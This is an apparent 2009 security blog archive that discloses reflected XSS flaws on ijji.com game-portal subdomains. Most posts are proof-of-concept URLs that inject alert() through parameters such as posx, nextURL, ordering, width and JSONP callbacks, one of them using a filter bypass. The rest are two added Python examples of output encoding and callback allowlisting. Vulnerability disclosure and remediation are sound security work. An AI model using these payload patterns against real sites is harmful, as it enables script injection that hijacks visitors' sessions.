Archive for the 'patched' Category

Global Pre-Download [BONUS2]

15 August 2009

Type: Non-persistent
Criteria: None

This final disclosure draws the series of predownload.nhn vulnerabilities to a close.

An actual explanation is due at a later date, when I will wrap this blog up and open it to feedback.

10) Miscellaneous

http://misc.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

11) Bulletin Board System

http://bbs.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

12) Channel

http://channel.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

13) Billing

http://billing.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

14) HTTPS Billing

https://billing.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

15) Facebook

http://facebook.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

16) Message

http://message.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

17) Avatar

http://avatar.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

Global Pre-Download [BONUS]

14 August 2009

Type: Non-persistent
Criteria: None

The penultimate post in this experimental blog, disclosing 9 separate vulnerabilities in predownload.nhn – a script which only appeared with Huxley.

1) Top-level

http://www.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

2) www2

http://www2.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

3) Huxley:The Dystopia

http://huxley.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

4) Soldier Front

http://sfront.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

5) GunZ

http://gunz.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

6) Drift City

http://drift.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

7) Lunia

http://lunia.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

8) Game

http://game.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

9) Events

http://event.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return

This script has an advantage over prelogin.nhn in that it won’t redirect to login or alert if the plugin is installed.

Login Next URL

11 August 2009

Type: Non-persistent
Criteria: None

http://login.ijji.com/login.nhn?nextURL=%27);alert(%27xss%27);//

There are no criteria, as you can be logged in or not – though if you are, you will be logged out (naturally).

In a nutshell, double quotes are encoded but single ones are not – and the nextURL parameter is carelessly output straight into a script tag (for the loginENMLoginForm function).

BBS Forum View

9 August 2009

Type: Non-persistent
Criteria: None

http://bbs.ijji.com/forumView.nhn?bbsId=gunz_free&page=&id=999999999&ordering=%22;alert(%27xss%27);//

Note that the exploit will execute twice.

Since the entire BBS system was exposed a few months back as being vulnerable to SQL injection, the id variable is now very picky about the data supplied to it. However, this exploit will still accept an id which doesn’t yet exist (less data is returned when it doesn’t exist, but the exploit works with or without a valid id).

The XSS relies on the value of ordering, which is blindly printed into the main page, and in both instances directly into a SCRIPT tag (the phrase “script” has been blacklisted from all scripts, which is why I’ve been using an alternative).

Lunia Poll Callback

5 August 2009

Type: Non-persistent
Criteria: None

http://event.ijji.com/poll.nhn?seqid=20090109_watuwantincs_lunia&callback=alert%28%27xss%27%29;//

JSON Info Callback

2 August 2009

Type: Non-persistent
Criteria: Logged in

http://message.ijji.com/external/personalinfo.nhn?callback=alert(%27xss%27);//

This script returns the number of unread messages and the number of buddies. This is a recent addition to the site, as there was a design overhaul on some sections.

Instead of complaining about the callback variable again, I wish to point out an issue I have with the logic of the content-type header. Valid callback parameters begin with the string:

jsonp

In doing so, the content header is correctly returned (it’s JSON) as text/javascript. However, by simply removing this text, the result is entirely different – text/html. Hmmph.

BBS Board View

30 July 2009

Type: Non-persistent
Criteria: None

http://bbs.ijji.com/boardView.nhn?themeName=black&width=alert(String.fromCharCode(120,115,115))

The vulnerability lies entirely within the variable width, which should only accept integer values of a restricted size (2-4 digits). The parameter is also pushed directly into a JavaScript eval function, which was a dangerous decision.
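
The three script-context bugs in the Login Next URL, BBS Forum View and BBS Board View posts (nextURL and ordering printed straight into a script tag with only double quotes encoded, width fed to eval) share one fix: validate or encode each value for the exact context it lands in. The following is an added example, not the site's code; the 2-4 digit width range is the page's, while the default width, variable names and function names are assumptions.

```python
import json
import re

# boardView's width is documented above as an integer of 2-4 digits; anything else
# falls back to a safe default instead of being echoed (the default is an assumption).
WIDTH_RE = re.compile(r"[0-9]{2,4}")
DEFAULT_WIDTH = 800


def parse_width(raw):
    """Coerce the width parameter to an int, or return DEFAULT_WIDTH if it is not 2-4 digits."""
    if raw is None or WIDTH_RE.fullmatch(raw) is None:
        return DEFAULT_WIDTH
    return int(raw)


def js_string_literal(value):
    """Encode an untrusted string as a JavaScript string literal for an inline <script> body.

    json.dumps emits a double-quoted literal and escapes both the double quote and
    the backslash, so neither quote kind can break out (the login bug above encoded
    only double quotes). ensure_ascii, the default, also escapes U+2028/U+2029, which
    would otherwise end a JavaScript line. '<', '>' and '&' become \\u00XX escapes so
    the HTML parser can never see '</script>' or '<!--' inside the literal.
    """
    encoded = json.dumps(str(value))
    return encoded.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")


def render_script(next_url, ordering, width):
    """Render the inline script with every request-controlled value passed through its encoder."""
    return (
        "<script>\n"
        "var nextURL = " + js_string_literal(next_url) + ";\n"
        "var ordering = " + js_string_literal(ordering) + ";\n"
        "var width = " + str(parse_width(width)) + ";\n"
        "</script>"
    )


if __name__ == "__main__":
    # Constructed inputs mirroring the shapes of the parameters discussed above.
    print(render_script("/main.nhn", "desc", "800"))
    print(render_script("');alert('xss');//", "\";alert('xss');//", "alert(1)"))
```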

JSON Last Login Callback [BONUS]

29 July 2009

Type: Non-persistent
Criteria: None

This post will disclose 5 different subdomains which all use the lastlogin.nhn script to return the last login time for each game. All follow the familiar pattern of an unsanitized callback variable, as seen in many other posts.

Gunz

http://gunz.ijji.com/external/lastlogin.nhn?format=jsonp&callback=%3Cimg%20src=x%20onerror=alert(%27xss%27)%20/%3E%3C!--

Soldier Front

http://sfront.ijji.com/external/lastlogin.nhn?format=jsonp&callback=%3Cimg%20src=x%20onerror=alert(%27xss%27)%20/%3E%3C!--

Lunia

http://lunia.ijji.com/external/lastlogin.nhn?format=jsonp&callback=%3Cimg%20src=x%20onerror=alert(%27xss%27)%20/%3E%3C!--

Drift City

http://drift.ijji.com/external/lastlogin.nhn?format=jsonp&callback=%3Cimg%20src=x%20onerror=alert(%27xss%27)%20/%3E%3C!--

IJJI’s license for Gunbound expired on July 23rd 2009 (source), but that service was also vulnerable.

Gunbound

http://gunbound.ijji.com/external/lastlogin.nhn?format=jsonp&callback=%3Cimg%20src=x%20onerror=alert(%27xss%27)%20/%3E%3C!--
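
The JSONP problems in this post and in the JSON Info Callback post above (a callback name echoed unsanitized, and a Content-Type that depends on whether the name starts with "jsonp") are fixed by allowlisting the callback as a JavaScript identifier path and fixing the Content-Type to a script type regardless of the name. This is an added example, not the site's code; the response shape, header set and length cap are assumptions.

```python
import json
import re

# A JSONP callback must be a JavaScript identifier path such as "jsonp", "jsonp12"
# or "app.onInfo"; anything else is rejected rather than echoed into the response.
CALLBACK_RE = re.compile(r"[A-Za-z_$][A-Za-z0-9_$]*(?:\.[A-Za-z_$][A-Za-z0-9_$]*)*")
MAX_CALLBACK_LEN = 64  # assumed cap; keeps the name from carrying a long payload


def valid_callback(name):
    """True only for a non-empty, bounded, identifier-path callback name."""
    if not name or len(name) > MAX_CALLBACK_LEN:
        return False
    return CALLBACK_RE.fullmatch(name) is not None


def jsonp_response(payload, callback):
    """Build (status, headers, body) for a JSONP endpoint such as personalinfo.nhn or lastlogin.nhn.

    The body is JavaScript whenever a callback is used, so the Content-Type is
    fixed to a script type instead of being derived from a 'jsonp' prefix on the
    name. ensure_ascii (json.dumps' default) escapes U+2028/U+2029 in the data.
    """
    if not valid_callback(callback):
        return (400,
                {"Content-Type": "application/json; charset=utf-8"},
                json.dumps({"error": "invalid callback"}))
    headers = {
        "Content-Type": "application/javascript; charset=utf-8",
        "X-Content-Type-Options": "nosniff",  # browser must not sniff the body as HTML
    }
    # The leading comment keeps request-influenced bytes out of the first position of
    # the response, a common hardening for reflected JSONP output.
    body = "/**/" + callback + "(" + json.dumps(payload) + ");"
    return 200, headers, body


if __name__ == "__main__":
    # Constructed sample data standing in for the unread-message/buddy counts the page describes.
    print(jsonp_response({"unread": 3, "buddies": 12}, "jsonp")[2])
    print(jsonp_response({"unread": 3, "buddies": 12}, "alert('xss');//")[0])
```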

Gunz Poll Callback

26 July 2009

Type: Non-persistent
Criteria: None

http://event.ijji.com/poll.nhn?seqid=20080522_Item%20of%20the%20Day%20Poll&callback=alert(%27xss%27);//

Huxley Poll Callback

25 July 2009

Type: Non-persistent
Criteria: None

http://event.ijji.com/poll.nhn?seqid=20090527_huxleyCBT_poll_3&callback=alert(%27xss%27);//
